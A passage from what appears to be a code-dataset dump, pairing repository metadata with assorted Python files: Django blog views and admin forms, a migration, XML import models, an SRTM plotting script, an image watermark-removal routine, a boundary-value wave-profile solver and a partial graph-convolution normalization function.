    return render(request, 'blog/post_list.html', {'posts': published})
def post_detail(request, pk):
post = get_object_or_404(Post, pk=pk)
return render(request, 'blog/post_detail.html', {'post': post})
@login_required
def post_new(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm()
return render(request, 'blog/post_edit.html', {'form': form})
@login_required
def post_edit(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = PostForm(request.POST, instance=post)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm(instance=post)
return render(request, 'blog/post_edit.html', {'form': form})
@login_required
def post_draft_list(request):
posts = Post.objects.filter(published_date__isnull=True).order_by('created_date')
return render(request, 'blog/post_draft_list.html', {'posts': posts})
@login_required
def post_publish(request, pk):
post = get_object_or_404(Post, pk=pk)
post.publish()
return redirect('post_detail', pk=pk)
@login_required
def post_remove(request, pk):
post = get_object_or_404(Post, pk=pk)
post.delete()
return redirect('post_list')
def add_comment_to_post(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = CommentForm(request.POST)
if form.is_valid():
comment = form.save(commit=False)
comment.post = post
comment.save()
return redirect('post_detail', pk=post.pk)
else:
form = CommentForm()
return render(request, 'blog/add_comment_to_post.html', {'form': form})
@login_required
def comment_approve(request, pk):
comment = get_object_or_404(Comment, pk=pk)
comment.approve()
return redirect('post_detail', pk=comment.post.pk)
@login_required
def comment_remove(request, pk):
comment = get_object_or_404(Comment, pk=pk)
comment.delete()
return redirect('post_detail', pk=comment.post.pk)
| [
"agarcia38@uabc.edu.mx"
] | agarcia38@uabc.edu.mx |
08b1e56759630fcea5127b62eaa611f2bf6e9ede | 6fdf73a4a2a9ad67f1f659332e46e92b1d02be20 | /build/youbot_description/catkin_generated/pkg.develspace.context.pc.py | 4cc34b216a670dcafc24a5ac494ae935084a8334 | [] | no_license | Spain2394/Extended-Kalman-ROS | 840e73a7e7196d6ff795bb0a6783129d5c166980 | 5d63719d6b5bbb13c318bb4841f53e2cc2102781 | refs/heads/master | 2020-03-31T19:02:01.426237 | 2018-11-06T22:06:18 | 2018-11-06T22:06:18 | 152,482,222 | 0 | 3 | null | 2018-10-16T20:30:37 | 2018-10-10T19:59:30 | Makefile | UTF-8 | Python | false | false | 393 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "youbot_description"
PROJECT_SPACE_DIR = "/home/parallels/Extended-Kalman-ROS/devel"
PROJECT_VERSION = "0.8.1"
| [
"aspain2394@gmailom"
] | aspain2394@gmailom |
1bb735e0fd1deee9b38800cc31038c19a6a092b1 | 2fa3be801aefa55fc7418bad9fa10a9a6a9542cf | /bookstore1/store/migrations/0017_auto_20210227_1440.py | 778107011c6355f0e5a9f1de38467d3dba87c1c2 | [] | no_license | dhruvijivani/Django_book_store | 24810d5732e0edfaee423a2cd06ff6d1d5994a53 | ee3fbb3a1aff0295c6884b5e0ff0c01f0d9f3a33 | refs/heads/master | 2023-03-28T16:19:45.043480 | 2021-03-31T13:51:26 | 2021-03-31T13:51:26 | 353,255,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | # Generated by Django 3.1.5 on 2021-02-27 09:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0016_bookreview'),
]
operations = [
migrations.AlterField(
model_name='bookreview',
name='stars',
field=models.FloatField(default=1),
),
]
| [
"dhruvijivani456@gmail.com"
] | dhruvijivani456@gmail.com |
526e3e00db493a51c593fccbce1531779d7614d2 | e7f2375f047673876c6a3efcf00ecc256f969b71 | /tests/__init__.py | eff650c6ae0df1b46ff6c510d337b6343bda3ffc | [
"Apache-2.0",
"MIT"
] | permissive | 7pairs/twingo | 31ff7675e6c0c420eefb0985ca959ab7cbf0fb4e | b81347dfdb0a7bb5f7f49bde39a9dd0a2d3aa7d6 | refs/heads/master | 2020-12-24T13:44:47.093096 | 2019-04-07T03:04:25 | 2019-04-07T03:10:48 | 19,700,263 | 0 | 0 | Apache-2.0 | 2019-11-01T13:41:25 | 2014-05-12T13:43:08 | Python | UTF-8 | Python | false | false | 611 | py | # -*- coding: utf-8 -*-
#
# Copyright 2015-2019 Jun-ya HASEBA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
| [
"7pairs@gmail.com"
] | 7pairs@gmail.com |
33d79d2f5595988091164be65f8e5d729905be9f | d656adb8de93c5a9fff7d91eaba9d37258b9be1c | /openemory/publication/symp_import.py | 7402e98c1f6ce40f0448c7970b637bce489b2cdd | [
"Apache-2.0"
] | permissive | emory-libraries/OpenEmory | cf9bb3da61a3cf2c2d4db4e274095faffbb6a80e | 889444bc97f784e516f088016e48a53b381ce2c5 | refs/heads/master | 2023-07-25T00:32:09.266768 | 2023-07-17T14:42:45 | 2023-07-17T14:42:45 | 8,471,248 | 1 | 1 | null | 2023-08-16T18:11:15 | 2013-02-28T03:37:19 | Python | UTF-8 | Python | false | false | 5,990 | py | from eulxml import xmlmap
from django.conf import settings
# Symplectic Import Models
class SympBase(xmlmap.XmlObject):
'''
Base class for Symplectic-Elements xml
'''
api_ns = 'http://www.symplectic.co.uk/publications/api'
atom_ns = 'http://www.w3.org/2005/Atom'
ROOT_NAMESPACES = {'api': api_ns, 'atom': atom_ns}
ROOT_NS = api_ns
XSD_SCHEMA = settings.BASE_DIR + '/publication/symp-api46.xsd'
class SympEntry(SympBase):
'''Minimal wrapper for Symplectic-Elements article'''
ROOT_NS = 'http://www.w3.org/2005/Atom'
ROOT_NAME = 'entry'
source = xmlmap.StringField("(api:object/api:records/api:record/@source-name)[1]")
'''first symplectic source of publication'''
source_id = xmlmap.StringField("(api:object/api:records/api:record/@id-at-source)[1]")
'''id in first symplectic source'''
title = xmlmap.StringField('atom:title')
'''title of article'''
class SympOEImportPublication(SympBase):
'''Minimal wrapper for Symplectic-Elements articles being imported into OE'''
ROOT_NS = 'http://www.w3.org/2005/Atom'
ROOT_NAME = 'feed'
entries = xmlmap.NodeListField('atom:entry', SympEntry)
'''List of Articles'''
#TODO Remaining feilds that needto be found
# Authors (FN, LN, AFF, netids for owners)
# Article Version
# Import into Symplectic-Elements
class SympPerson(SympBase):
'''Person Info'''
ROOT_NAME = 'person'
last_name = xmlmap.StringField('api:last-name')
'''Last name of person'''
initials = xmlmap.StringField('api:initials')
'''Initials of person'''
class SympDate(SympBase):
'''Date Info'''
ROOT_NAME = 'date'
day = xmlmap.StringField('api:day')
'''Day portion of date'''
month = xmlmap.StringField('api:month')
'''Month portion of date'''
year = xmlmap.StringField('api:year')
'''Year portion of date'''
class SympWarning(SympBase):
'''Warning returned from publication creation'''
ROOT_NAME = 'warning'
message = xmlmap.StringField("text()")
'''Warning message'''
class OESympImportPublication(SympBase):
'''Minimal wrapper for Symplectic-Elements articles being imported from OE'''
ROOT_NAME = 'import-record'
types = xmlmap.StringListField("api:native/api:field[@name='types']/api:items/api:item")
'''Subtype of publication (defaults to Article)'''
type_id = xmlmap.StringField("@type-id")
'''Type Id of Article (defaults to 5)'''
title = xmlmap.StringField("api:native/api:field[@name='title']/api:text")
'''Title of Article'''
language = xmlmap.StringField("api:native/api:field[@name='language']/api:text")
'''Language of Article'''
abstract = xmlmap.StringField("api:native/api:field[@name='abstract']/api:text")
'''Abstract of Article'''
volume = xmlmap.StringField("api:native/api:field[@name='volume']/api:text")
'''Volume of Article'''
issue = xmlmap.StringField("api:native/api:field[@name='issue']/api:text")
'''Volume of Article'''
publisher = xmlmap.StringField("api:native/api:field[@name='publisher']/api:text")
'''Publisher of Article'''
publisher = xmlmap.StringField("api:native/api:field[@name='publisher']/api:text")
'''Publisher of Article'''
publication_date = xmlmap.NodeField("api:native/api:field[@name='publication-date']/api:date", SympDate)
'''Date of publication of Article'''
authors = xmlmap.NodeListField("api:native/api:field[@name='authors']/api:people/api:person", SympPerson)
'''Authors associated with Article'''
doi = xmlmap.StringField("api:native/api:field[@name='doi']/api:text")
'''DOI of Article'''
keywords = xmlmap.StringListField("api:native/api:field[@name='keywords']/api:keywords/api:keyword")
'''Keywords of Article'''
journal = xmlmap.StringField("api:native/api:field[@name='journal']/api:text")
'''Journal Name in which the Article appears'''
notes = xmlmap.StringField("api:native/api:field[@name='notes']/api:text")
'''Author Notes on the Article'''
pmcid = xmlmap.StringField("api:native/api:field[@name='external-identifiers']/api:identifiers/api:identifier[@scheme='pmc']")
'''PMCID Article appears'''
warnings = xmlmap.NodeListField('//api:warning', SympWarning)
'''Warning returned after publication creation'''
entries = xmlmap.NodeListField('//atom:entry', SympEntry)
'''entries returned from query'''
def __init__(self, *args, **kwargs):
super(OESympImportPublication, self).__init__(*args, **kwargs)
self.type_id = 5
self.types = ["Article","Book","Chapter","Conference","Poster","Dataset"]
def is_empty(self):
"""Returns True if all fields are empty, and no attributes
other than **type_id** . False if any fields
are not empty."""
# ignore these fields when checking if a related item is empty
ignore = ['type_id', 'types'] # type attributes
for name in self._fields.keys():
if name in ignore:
continue
f = getattr(self, name)
# if this is an XmlObject or NodeListField with an
# is_empty method, rely on that
if hasattr(f, 'is_empty'):
if not f.is_empty():
return False
# if this is a list or value field (int, string), check if empty
elif not (f is None or f == '' or f == []):
return False
# no non-empty non-ignored fields were found - return True
return True
class SympRelation(SympBase):
'''Minimal wrapper for Symplectic-Elements relation being imported from OE'''
ROOT_NAME = 'import-relationship'
# Types of relations
PUB_AUTHOR = 'publication-user-authorship'
from_object = xmlmap.StringField("api:from-object")
to_object = xmlmap.StringField("api:to-object")
type_name = xmlmap.StringField("api:type-name")
'''Relation type''' | [
"alexandr.zotov@emory.edu"
] | alexandr.zotov@emory.edu |
da4336d60fedd558631c28d01057f746f8c5b86b | de6bfbf5557a562cd816f7b0b4bd4b9fa9257d76 | /tezina/admin.py | 86b0c6d14089d5b35d1c2c792b1b8c99a7a50dd8 | [] | no_license | SavkeBG/Za_Miljana | 6ef27ce9720b1cba71093c2b4a5ec5b6b3517d61 | e41c28864b6ecf785820abe76d0605531b075200 | refs/heads/master | 2020-12-15T01:11:16.365605 | 2020-05-20T14:35:51 | 2020-05-20T14:35:51 | 259,031,392 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,205 | py | from django import forms
from django.contrib import admin
from django.contrib.auth.models import Group
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.forms import ReadOnlyPasswordHashField
from tezina.forms import UserForm
from tezina.models import MyUser,Data
class UserCreationForm(forms.ModelForm):
"""A form for creating new users. Includes all the required
fields, plus a repeated password."""
password1 = forms.CharField(label='Password', widget=forms.PasswordInput)
password2 = forms.CharField(label='Password confirmation', widget=forms.PasswordInput)
class Meta:
model = MyUser
fields = ('email', 'first_name','last_name')
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords don't match")
return password2
def save(self, commit=True):
# Save the provided password in hashed format
user = super().save(commit=False)
user.set_password(self.cleaned_data["password1"])
if commit:
user.save()
return user
class UserChangeForm(forms.ModelForm):
"""A form for updating users. Includes all the fields on
the user, but replaces the password field with admin's
password hash display field.
"""
password = ReadOnlyPasswordHashField()
class Meta:
model = MyUser
fields = ('email', 'password', 'first_name','last_name', 'is_active', 'is_admin')
def clean_password(self):
# Regardless of what the user provides, return the initial value.
# This is done here, rather than on the field, because the
# field does not have access to the initial value
return self.initial["password"]
class UserAdmin(BaseUserAdmin):
# The forms to add and change user instances
form = UserChangeForm
add_form = UserCreationForm
# The fields to be used in displaying the User model.
# These override the definitions on the base UserAdmin
# that reference specific fields on auth.User.
list_display = ('email', 'first_name','last_name', 'is_admin')
list_filter = ('is_admin',)
fieldsets = (
(None, {'fields': ('email', 'password')}),
('Personal info', {'fields': ('first_name', 'last_name',)}),
('Permissions', {'fields': ('is_admin',)}),
)
# add_fieldsets is not a standard ModelAdmin attribute. UserAdmin
# overrides get_fieldsets to use this attribute when creating a user.
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'first_name', 'last_name', 'password1', 'password2'),
}),
)
search_fields = ('email',)
ordering = ('email',)
filter_horizontal = ()
# Now register the new UserAdmin...
admin.site.register(MyUser,UserAdmin)
admin.site.register(Data)
# ... and, since we're not using Django's built-in permissions,
# unregister the Group model from admin.
admin.site.unregister(Group)
| [
"60061747+SavkeBG@users.noreply.github.com"
] | 60061747+SavkeBG@users.noreply.github.com |
8cbe4de82e8973e9de229af929a25871f3a061bc | 20d54e88dbdab0a0335f6ae4bad22117e14eb556 | /src/py3/srtmTest.py | 475a6f72cca4bfec1cea1366608b23bc1b003792 | [] | no_license | bjohan/GnuradioTransceiver | ebf0426aabf5be4e06a52ac7a8ce941e14341ea7 | 501d68f78e40931f2f9549ab1ae1982faae464c6 | refs/heads/master | 2021-01-11T03:36:48.162992 | 2020-05-17T21:15:19 | 2020-05-17T21:15:19 | 70,995,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | import matplotlib.pyplot as plt
import numpy as np
import srtmData
import heightResampler
sd = srtmData.SrtmData()
hr = heightResampler.HeightResampler(sd)
e, x, y = sd.getBlock(12, 57)
print(x)
print(y)
#plt.figure(1)
#plt.imshow(np.clip(e, 0, 10000), extent=[x[0], x[-1], y[-1], y[0]])
plt.figure(2)
xr = np.linspace(-180,180,500*2)
yr = np.linspace(-60,60,500)
#xr = np.linspace(12,14,500)
#yr = np.linspace(57,59,500)
#australia
#xr = np.linspace(110,155,10000)
#yr = np.linspace(-45,-10,5000)
rs = hr.get(xr, yr)
plt.imshow(np.clip(rs,0,10000), extent=[xr[0], xr[-1], yr[0], yr[-1]])
plt.show()
| [
"you@example.com"
] | you@example.com |
11c5f5a44aa9b30dfabc72fe4bab7220475ad937 | 69856ac8d1dcdde6fc44abd09cbc8e5911949486 | /remove_water_mark.py | 853a6f9f29c9883bb04591c9effd29842f54daab | [] | no_license | Bigmai-1234/remove_water_mark | 3d10816580599b5e090ff0c61e080fe5bef415e2 | 317126ac6b7222e2da410b3c7ae8fe2f039de1ac | refs/heads/master | 2022-12-01T15:15:29.809582 | 2020-08-20T09:28:34 | 2020-08-20T09:28:34 | 288,961,211 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,165 | py | import cv2
import numpy as np
import os
def move_mark(slices,percentile_ratio):
hight, width, depth = slices.shape[0:3]
sum_ = slices.sum(2)
t = list(set(list(np.array(sum_).flat)))
qual = np.percentile(t,percentile_ratio)
for h in range(hight):
for w in range(width):
if sum_[h][w] > qual:
slices[h][w] = [255,255,255]
return slices
def sliding_window(image, stepSize, windowSize):
# slide a window across the image
for y in range(0, image.shape[0], stepSize[1]):
for x in range(0, image.shape[1], stepSize[0]):
# yield the current window
yield (x, y, image[y:y + windowSize[1], x:x + windowSize[0]])
# 返回滑动窗结果集合,本示例暂时未用到
def get_slice(image, stepSize, windowSize):
slice_sets = []
for (x, y, window) in sliding_window(image, stepSize, windowSize):
# if the window does not meet our desired window size, ignore it
if window.shape[0] != windowSize[1] or window.shape[1] != windowSize[0]:
continue
slice = image[y:y + windowSize[1], x:x + windowSize[0]]
slice_sets.append(slice)
return slice_sets
def do_remove_mark(image,percentile_ratio,size_):
# 自定义滑动窗口的大小
w = image.shape[1]
h = image.shape[0]
# 本代码将图片分为3×3,共九个子区域,winW, winH和stepSize可自行更改
(winW, winH) = (int(w/size_),int(h/size_))
stepSize = (int(w/size_), int(h/size_))
for (x, y, window) in sliding_window(image, stepSize=stepSize, windowSize=(winW, winH)):
# if the window does not meet our desired window size, ignore it
if window.shape[0] != winH or window.shape[1] != winW:
continue
slice = image[y:y+winH,x:x+winW]
image[y:y+winH,x:x+winW] = move_mark(slice,percentile_ratio)
return image
# TODO
# path = "./train/1/"
# for img_ in os.listdir(path):
# if img_[-3:] != "png":continue
# image = cv2.imread(path + img_)
# img = do_remove_mark(image,50,500)
# img = do_remove_mark(img,50,3)
# cv2.imwrite("./trainres/" + img_,img)
| [
"noreply@github.com"
] | noreply@github.com |
50b96baeea9e8f562f0e5e8956dbf533ee376afa | 4a7bb7151259b5390100bd0d385a02fb8aa376b2 | /stablab/wave_profile.py | ab128f1c79c8c45a8b8d6deee20fbdbd95bf8401 | [
"MIT"
] | permissive | nonlinear-waves/stablab_python | 5c184382d4c847b884043268af4234380f8cccc0 | 101724f8bcefc34e90cf70d0813919188e08cb8a | refs/heads/master | 2021-01-10T05:46:55.316165 | 2019-09-12T14:51:05 | 2019-09-12T14:51:05 | 52,907,189 | 2 | 5 | MIT | 2019-09-25T02:31:56 | 2016-03-01T20:22:55 | Jupyter Notebook | UTF-8 | Python | false | false | 13,299 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 19 10:02:46 2017
@author: Taylor Paskett
This file is a translation into PYTHON of the folder bin_profile from the
MATLAB version of STABLAB
"""
import numpy as np
import scipy.linalg as scipylin
from scipy.integrate import solve_bvp
def profile_flux(p,s,s_old=None):
"""
# Solves the profile for the flux formulation.
# If s.s_old exists, then this
# is used for the initial guess. Otherwise, a tanh
# solution is used for an initial guess. Left and right
# numerical infinity are expanded as needed to assure
# the end state error is within s.tol, though s.L = s.R
# in this program, which may not be necessary. Uneeded
# mesh points of the solution are removed to speed up
# interpolation and continuation routines.
#
# The user must include in the input structures the following:
#
# s.phase - a vector of phase conditions
# s.order - a vector indicating the order in which the phase
# conditions should be applied.
# s.F - a function handle to the profile, e.g. s.F = @F, F(x,y,s,p) = ...
# s.UL, UR - end states of the n-r equations that need to be solved in
# flux formulation. UL at - infinity, UR at + infinity
# s.n = n-r in flux formulation (number of profile equations to integrate)
#
# Optional input:
# s.tol - profile endstate maxim absolute error, (defaults to 1e-4)
# s.R_max - maximum allowed interval length on right (defaults to 100)
# s.L_max - maximum allowed interval length on left (defaults to 100)
"""
#------------------------------------------------------------
# End states
#------------------------------------------------------------
# end state tolerance
if 'tol' not in s:
s['tol'] = 1e-4
# default for maximum value of R
if 'R_max' not in s:
s['R_max'] = 100
# default for maximum value of L
if 'L_max' not in s:
s['L_max'] = 100
# numerical infinity
s['I'] = 1
# profile solved on right half domain
s['side'] = 1
# array for right hand side
s['rarray'] = np.array(range(s['n']))
# array for left hand side
s['larray'] = np.array(range(s['n'],2*s['n']))
# bvp solver projections
A_min = s['Flinear'](s['UL'],p)
s['LM'] = scipylin.orth(projection(A_min,-1,0)) # Removed .T inside orth
A_plus = s['Flinear'](s['UR'],p)
s['LP'] = scipylin.orth(projection(A_plus,1,0)) # Removed .T inside orth
# This gives us the number of phase conditions needed
s['n_phs'] = s['n']-s['LM'].shape[1]-s['LP'].shape[1]
if s['n_phs'] < 1:
print("Eigenvalues at negative infinity: ")
print(np.linalg.eigvals(A_min))
print("Eigenvalues at positive infinity: ")
print(np.linalg.eigvals(A_plus))
raise ValueError("profile_flux.m does not solve undercompressive profiles")
# bvp tolerances
if 'bvp_options' not in s:
s['bvp_options'] = {'Tol': 1e-5,'Nmax': 2000}
elif 'Nmax' not in s['bvp_options']:
s['bvp_options']['Nmax'] = 2000
elif 'Tol' not in s['bvp_options']:
s['bvp_options']['Tol'] = 1e-5
# tol and max_nodes
# positive numerical infinity
# -----------------------------------------------------------
# solve the profile initially
# -----------------------------------------------------------
p,s = profile(p,s,s_old)
# -----------------------------------------------------------
# take out extra mesh points
# -----------------------------------------------------------
# stride = how many points to take out of solution to
# minimize points in final solution.
stride = 3
s['stride'] = stride
s_old = s
mesh = len(s_old['sol'].x)
mesh_old = mesh+1
while mesh < mesh_old:
p,s = profile(p,s,s_old)
s_old = s
mesh_old = mesh
mesh = len(s_old['sol'].x)
s['stride'] = stride
return p,s
def profile(p,s,s_old):
#--------------------------------------------------------------------------
# provide initial guess
#--------------------------------------------------------------------------
if isinstance(s_old, dict):
if 'solver' in s_old:
if s_old['solver'] == 'bvp':
pre_guess = lambda x: continuation_guess(x,s_old,s)
else:
pre_guess = lambda x: ode_to_bvp_guess(x,s_old,s)
s['stride'] = 3
else:
pre_guess = lambda x: continuation_guess(x,s_old,s)
stride = s_old['stride']
x_dom = s_old['sol'].x[::stride].copy() # do I need the .copy() ?
if (len(s_old['sol'].x)-1) % stride != 0:
x_dom[-1] = s_old['sol'].x[-1]
s['I'] = s_old['I']
s['L']= s_old['L']
s['R'] = s_old['R']
else:
s['I'] = 1
if 'R' not in s:
s['R'] = 5
s['L'] = -s['R']
pre_guess = lambda x: guess(x,s)
x_dom = np.linspace(0,1,30)
#--------------------------------------------------------------------------
# convergence to endstates tolerance
#--------------------------------------------------------------------------
err = s['tol'] + 1
while err > s['tol']:
pre_bc = lambda x,y: bc(x,y,s)
pre_ode = lambda x,y: double_F(x,y,s,p)
initGuess = np.array([pre_guess(x) for x in x_dom],dtype=np.complex).T
s['sol'] = solve_bvp(pre_ode,pre_bc,x_dom,initGuess,
tol=s['bvp_options']['Tol'],
max_nodes=s['bvp_options']['Nmax'])
err1 = np.max(np.abs(s['sol'].y[s['rarray'],-1] - s['UR']))
err2 = np.max(np.abs(s['sol'].y[s['larray'],-1] - s['UL']))
err = max(err1,err2)
if 'stats' in s:
if s['stats'] == 'on':
print("Profile boundary error: ",err)
if err > s['tol']:
s_old = s
if err1 > s['tol']:
s['R'] *= 1.1#*s['R']
s['L'] = -s['R']
if err2 > s['tol']:
s['L'] *= 1.1#*s.L;
s['R'] = -s['L']
if abs(s['L']) > s['L_max']:
raise ValueError("""Could not meet specified tolerance in profile solver
without exceeding the maximum allowed value of negative infinity.""")
if abs(s['R']) > s['R_max']:
raise ValueError("""Could not meet specified tolerance in profile solver
without exceeding the maximum allowed value of positive infinity.""")
if err > s['tol']:
pre_guess = lambda x: continuation_guess(x,s_old,s)
x_dom = s_old['sol'].x
return p,s
def guess(x,s):
# guess using tanh solution
a = 0.5*(s['UL']+s['UR'])
c = 0.5*(s['UL']-s['UR'])
outVector = np.concatenate([a-c*np.tanh((s['R']/s['I'])*x),
a-c*np.tanh((s['L']/s['I'])*x)])
return outVector
def bc(ya,yb,s):
# Boundary conditions. We split the problem in half and reflect onto
# the right side
outVector = np.concatenate([
ya[s['rarray']]-ya[s['larray']], # matching conditions
np.dot(s['LM'].T , (yb[s['larray']] - s['UL'])), # projection at - infinity
np.dot(s['LP'].T , (yb[s['rarray']] - s['UR'])), # projection at + infinity
ya[s['order'][0:s['n_phs']]]-s['phase'][s['order'][:s['n_phs']]] # Phase conditions
])
return outVector
def ode_to_bvp_guess(x,s_old,s):
out = np.array([[ deval(s_old['sol'],(s.R/s.I)*x)],
[ deval(s_old['sol'],(s.L/s.I)*x)]],dtype=np.complex)
return out
def continuation_guess(x,s_old,s_new):
"""
# Ouput gives initial guess for boundary value solver at x where s_old is
# the standard stablab structure s for the previously solved boundary value
# solution and s_new is that for the solution being solved. If v is the
# solution corresponding to s_new and y is the solution corresponding to
# s_old, continuation_guess yields as output v=a*y+b done componenet wise
# to allow phase conditions to be specified and so v matches its end
# states.
"""
y = deval(x,s_old['sol'])
out = np.zeros((len(y)),dtype=np.complex)
# coefficients for the guess for the new function v \approx a*y+b done
# componentswise. Positive infinity corresponds to the first column of the
# coefficeint matrices, and negative infinity corresponds to the second
# column of coefficient matrices.
a = np.zeros((len(s_old['rarray']),2),dtype=np.complex)
b = np.zeros((len(s_old['rarray']),2),dtype=np.complex)
# find scaling coefficients
for j in range(len(s_old['rarray'])):
# determine if the phase condition should be specified for the jth
# component
specify_phase = False
for k in range(len(s_new['order'])):
if j == s_new['order'][k]:
specify_phase = True
phase_index = j # Changed to j from k
# determine coefficients based on type
vminus = s_new['UL'][j]
vplus = s_new['UR'][j]
yminus = s_old['UL'][j]
yplus = s_old['UR'][j]
if specify_phase: # case where the phase condition is specified
vnot = s_new['phase'][phase_index]
ynot = s_old['phase'][phase_index]
vec = np.dot(np.linalg.inv(np.array([[yplus,1,0,0],
[ynot,1,0,0],[0,0,yminus,1],[0,0,ynot,1]])),
np.array([[vplus],[vnot],[vminus],[vnot]],
dtype=np.complex))
a[j,0] = vec[0]
b[j,0] = vec[1]
a[j,1] = vec[2]
b[j,1] = vec[3]
else: # case where the phase condition is not specified
if yplus == yminus:
a[j,0]=1
b[j,0]=0
a[j,1]=1
b[j,1]=0
else:
vec = np.dot(np.linalg.inv(np.array([[yplus,1],
[yminus,1]],dtype=np.complex)),
np.array([[vplus],[vminus]],dtype=np.complex))
a[j,0] = vec[0]
b[j,0] = vec[1]
a[j,1] = vec[0]
b[j,1] = vec[1]
# make the affine transformation, v=a*y+b
out[s_old['rarray']] = a[:,0]*y[s_old['rarray']]+b[:,0]
out[s_old['larray']] = a[:,1]*y[s_old['larray']]+b[:,1]
return out
def double_F(x,y,s,p,otherargs=None):
"""
# out = double_F(x,y,s,p)
#
# Returns the split domain for the ode given in the function F.
#
# Input "x" and "y" are provided by the ode solver.Note that s.rarray
# should be [1,2,...,k] and s.larray should be [k+1,k+2,...,2k]. See
# STABLAB documentation for more information about the structure s.
"""
if otherargs is not None:
out = np.vstack([(s['R']/s['I'])*s['F']((s['R']/s['I'])*x,
y[s['rarray'],:],s,p,otherargs),
(s['L']/s['I'])*s['F']((s['L']/s['I'])*x,
y[s['larray'],:],s,p,otherargs)])
else:
out = np.vstack([(s['R']/s['I'])*s['F']((s['R']/s['I'])*x,
y[s['rarray'],:],s,p),
(s['L']/s['I'])*s['F']((s['L']/s['I'])*x,
y[s['larray'],:],s,p)])
return out
def projection(matrix,posneg,eps):
"""
"""
D,R = np.linalg.eig(matrix)
L = np.linalg.inv(R)
P = np.zeros(R.shape,dtype=np.complex)
if posneg == 1:
index = np.where(np.real(D) > eps)
elif posneg == -1:
index = np.where(np.real(D) < eps)
elif posneg == 0:
index = np.where(np.abs(np.real(D)) < eps)
for j in index:
P = P + np.dot(R[:,j],L[j,:])
Q = np.concatenate([np.dot(P,R[:,j]) for j in index])
out = np.concatenate([P,Q],axis=1)
return P
def deval(x,solStruct):
"""
Takes two inputs, x and solStruct, and returns the y values corresponding
to the x values
"""
return solStruct.sol(x).real
def soln(xArray,s):
"""
# out = soln(x,s)
#
# Returns the solution of bvp problem where the domain was split in half
#
# Input "x" is the value where the solution is evaluated and "s" is a
# stucture described in the STABLAB documenation
"""
if isinstance(xArray,(float, int)):
outVector = np.zeros((1,s['n']))
if xArray < 0:
xArray = s['side']*s['I']/s['L']*xArray
temp = deval(xArray,s['sol'])
outVector = temp[s['larray']]
else:
xArray = s['side']*s['I']/s['R']*xArray
temp = deval(xArray,s['sol'])
outVector = temp[s['rarray']]
else:
outVector = np.zeros((len(xArray),s['n']))
for index,x in enumerate(xArray):
if x < 0:
x = s['side']*s['I']/s['L']*x
temp = deval(x,s['sol'])
outVector[index] = temp[s['larray']]
else:
x = s['side']*s['I']/s['R']*x
temp = deval(x,s['sol'])
outVector[index] = temp[s['rarray']]
return outVector.real
| [
"taylor.paskett@gmail.com"
] | taylor.paskett@gmail.com |
920828613ae5a1da0f018049610070c91b9fc58b | 9076766a8d7751bc5802600d417d1316386d36d5 | /nn/conv/tenet.py | 973c888491bdc00d3a6a5821d4862ea91e2d6889 | [] | no_license | convei-lab/torch_geometric | 2cdd1b2df43426cb02f39fd6c588a1c9a4293688 | 84ef9b96331a6c72647b2b1c8026a27ba1a9488c | refs/heads/main | 2023-04-27T09:04:45.561276 | 2021-05-24T03:03:33 | 2021-05-24T03:03:33 | 323,888,438 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,052 | py | from operator import ne, neg
from typing import Optional, Tuple
from torch_geometric.typing import Adj, OptTensor, PairTensor
import torch
from torch import Tensor
import torch.nn as nn
from torch.nn import Parameter, BCEWithLogitsLoss
from torch_scatter import scatter_add
from torch_sparse import SparseTensor, matmul, fill_diag, sum as sparse_sum, mul
from torch_geometric.utils import add_remaining_self_loops, negative_sampling
from torch_geometric.utils.num_nodes import maybe_num_nodes
import torch_geometric.nn.inits as tgi
from torch.nn import functional as F
@torch.jit._overload
def gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,
add_self_loops=True, dtype=None):
# type: (Tensor, OptTensor, Optional[int], bool, bool, Optional[int]) -> PairTensor # noqa
pass
@torch.jit._overload
def gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,
add_self_loops=False, dtype=None):
# type: (SparseTensor, OptTensor, Optional[int], bool, bool, Optional[int]) -> SparseTensor # noqa
pass
def gcn_norm(edge_index, edge_weight=None, num_nodes=None, improved=False,
add_self_loops=True, dtype=None):
fill_value = 2. if improved else 1.
if isinstance(edge_index, SparseTensor):
adj_t = edge_index
if not adj_t.has_value():
adj_t = adj_t.fill_value(1., dtype=dtype)
if add_self_loops:
adj_t = fill_diag(adj_t, fill_value)
deg = sparse_sum(adj_t, dim=1)
deg_inv_sqrt = deg.pow_(-0.5)
deg_inv_sqrt.masked_fill_(deg_inv_sqrt == float('inf'), 0.)
adj_t = mul(adj_t, deg_inv_sqrt.view(-1, 1))
adj_t = mul(adj_t, deg_inv_sqrt.view(1, -1))
return adj_t
else:
